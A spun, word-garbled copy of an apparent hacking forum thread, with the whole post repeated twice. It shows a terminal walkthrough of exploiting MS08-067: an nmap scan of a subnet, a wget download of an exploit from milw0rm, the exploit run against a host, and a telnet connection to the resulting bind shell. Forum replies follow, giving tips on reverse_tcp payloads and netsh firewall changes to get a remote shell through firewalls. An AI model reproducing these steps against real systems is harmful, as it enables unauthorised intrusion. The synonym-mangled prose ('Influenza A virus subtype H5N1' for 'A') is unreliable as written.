b4cktr4ck3 / # svn co --username invitee --password "" svn://svn.insecure.org/nmap-exp/ron
b4cktr4ck3 / # cd ron/nmap-smb
b4cktr4ck3 nmap-smb # ./configure
b4cktr4ck3 nmap-smb # make
b4cktr4ck3 nmap-smb # brand install
b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse -p 445 192.168.1.0/24
Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
Interesting ports on 192.168.1.127:
PORT STATE SERVICE
445/tcp unopen microsoft-ds
Interesting ports on 192.168.1.128:
PORT STATE SERVICE
445/tcp unopen microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)
Interesting ports on 192.168.1.237:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)
Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067
b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
--13:45:35-- http://www.milw0rm.com/exploits/download/7132.py
=> `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP asking sent, awaiting response... 200 OK
Length: unspecified [text/plain]
[ <=> ] 7,085 --.--K/s
13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
b4cktr4ck3 / # python 7132.py 192.168.1.237 2
#######################################################################
# MS08-067 Exploit past times Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#######################################################################
[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
b4cktr4ck3 / # telnet 192.168.1.237 4444
Trying 192.168.1.237...
Connected to 192.168.1.237.
Escape graphic symbol is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Are yous using bind_tcp ?
reverse_tcp should bypass the firewall, but inwards lodge to purpose bind_tcp yous have
to execute this ascendency get-go netsh firewall gear upward portopening TCP 6112
where 6112 is the port listened on past times meterpreter. You could exercise that amongst for
example the "Windows Execute Command" payload.
You've got this a fleck twisted. Influenza A virus subtype H5N1 bind_tcp payload volition opened upward a socket on the victim box together with psyche for connections to it. The occupation amongst this is that a host based firewall may block incoming connections so that when your "evil hacker" box attempts to connect to the bind_tcp backdoor, it's incoming parcel is blocked past times the firewall together with thence cannot institute a connectedness amongst the listening bind_tcp socket.
A reverse_tcp backdoor does the opposite of a bind_tcp. It does non create a local listening socket, it establishes a opposite connectedness outbound from the victim to whatever IP together with port yous specified when yous created the payload. This technique takes payoff of the fact that most network based firewalls may non let traffic into the network, but volition unremarkably let outbound traffic without whatsoever problem. Especially if your reverse_tcp compaction is calling out to a pop port such equally port fourscore or 443. Also, about host based firewalls volition let these connections fifty-fifty if they are blocking incoming connections (usually because the user got tired of clicking "allow" or "deny" all the time).
For your specific problem, since file together with impress sharing is turned on, bear witness a reverse_tcp to port TCP/139 of your "evil hacker" box (make certain samba is non running when yous exercise this).
If yous desire to larn to a greater extent than nigh reverse_tcp, google for "shoveling a shell". That is the term unremarkably associated amongst reverse_tcp connections.
-------------------------------
What form of payload are yous using? If it is a uncomplicated tcp_backdoor so on the box yous merely exploited, opened upward a cmd shell, run netstat -an together with if yous run across TCP/4444 listening, so the occupation is in all likelihood firewall related.
If yous are using a reverse_tcp_backdoor, so my justice is that the victim is non allowing the backdoor to install/execute. Try a unlike payload.
Since yous provided no data nigh your network or victim host setup, this is all I tin privy mean value of.
Reply With Quote
------------------------------
b4cktr4ck3 / # cd ron/nmap-smb
b4cktr4ck3 nmap-smb # ./configure
b4cktr4ck3 nmap-smb # make
b4cktr4ck3 nmap-smb # brand install
b4cktr4ck3 ron # nmap -T insane --script smb-check-vulns.nse -p 445 192.168.1.0/24
Starting Nmap 4.76 ( http://nmap.org ) at 2008-11-29 13:43 GMT
Interesting ports on firewall.localhost.com (192.168.1.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds
MAC Address: 00:1A:70:14:3A:E7 (Cisco-Linksys)
Interesting ports on 192.168.1.127:
PORT STATE SERVICE
445/tcp unopen microsoft-ds
Interesting ports on 192.168.1.128:
PORT STATE SERVICE
445/tcp unopen microsoft-ds
MAC Address: 00:04:4B:18:69:8A (Nvidia)
Interesting ports on 192.168.1.237:
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:4A:B6:6D (VMware)
Host script results:
|_ smb-check-vulns: This host is vulnerable to MS08-067
b4cktr4ck3 / # wget http://www.milw0rm.com/exploits/download/7132.py
--13:45:35-- http://www.milw0rm.com/exploits/download/7132.py
=> `7132.py'
Resolving www.milw0rm.com... 76.74.9.18
Connecting to www.milw0rm.com|76.74.9.18|:80... connected.
HTTP asking sent, awaiting response... 200 OK
Length: unspecified [text/plain]
[ <=> ] 7,085 --.--K/s
13:45:35 (233.53 KB/s) - `7132.py' saved [7085]
b4cktr4ck3 / # python 7132.py 192.168.1.237 2
#######################################################################
# MS08-067 Exploit past times Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#######################################################################
[-]Windows 2003[SP2] payload loaded
[-]Initiating connection
[-]connected to ncacn_np:192.168.1.237[\pipe\browser]
[-]Exploit sent to target successfully...
[1]Telnet to port 4444 on target machine...
b4cktr4ck3 / # telnet 192.168.1.237 4444
Trying 192.168.1.237...
Connected to 192.168.1.237.
Escape graphic symbol is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>
Are yous using bind_tcp ?
reverse_tcp should bypass the firewall, but inwards lodge to purpose bind_tcp yous have
to execute this ascendency get-go netsh firewall gear upward portopening TCP 6112
where 6112 is the port listened on past times meterpreter. You could exercise that amongst for
example the "Windows Execute Command" payload.
You've got this a fleck twisted. Influenza A virus subtype H5N1 bind_tcp payload volition opened upward a socket on the victim box together with psyche for connections to it. The occupation amongst this is that a host based firewall may block incoming connections so that when your "evil hacker" box attempts to connect to the bind_tcp backdoor, it's incoming parcel is blocked past times the firewall together with thence cannot institute a connectedness amongst the listening bind_tcp socket.
A reverse_tcp backdoor does the opposite of a bind_tcp. It does non create a local listening socket, it establishes a opposite connectedness outbound from the victim to whatever IP together with port yous specified when yous created the payload. This technique takes payoff of the fact that most network based firewalls may non let traffic into the network, but volition unremarkably let outbound traffic without whatsoever problem. Especially if your reverse_tcp compaction is calling out to a pop port such equally port fourscore or 443. Also, about host based firewalls volition let these connections fifty-fifty if they are blocking incoming connections (usually because the user got tired of clicking "allow" or "deny" all the time).
For your specific problem, since file together with impress sharing is turned on, bear witness a reverse_tcp to port TCP/139 of your "evil hacker" box (make certain samba is non running when yous exercise this).
If yous desire to larn to a greater extent than nigh reverse_tcp, google for "shoveling a shell". That is the term unremarkably associated amongst reverse_tcp connections.
-------------------------------
What form of payload are yous using? If it is a uncomplicated tcp_backdoor so on the box yous merely exploited, opened upward a cmd shell, run netstat -an together with if yous run across TCP/4444 listening, so the occupation is in all likelihood firewall related.
If yous are using a reverse_tcp_backdoor, so my justice is that the victim is non allowing the backdoor to install/execute. Try a unlike payload.
Since yous provided no data nigh your network or victim host setup, this is all I tin privy mean value of.
Reply With Quote
------------------------------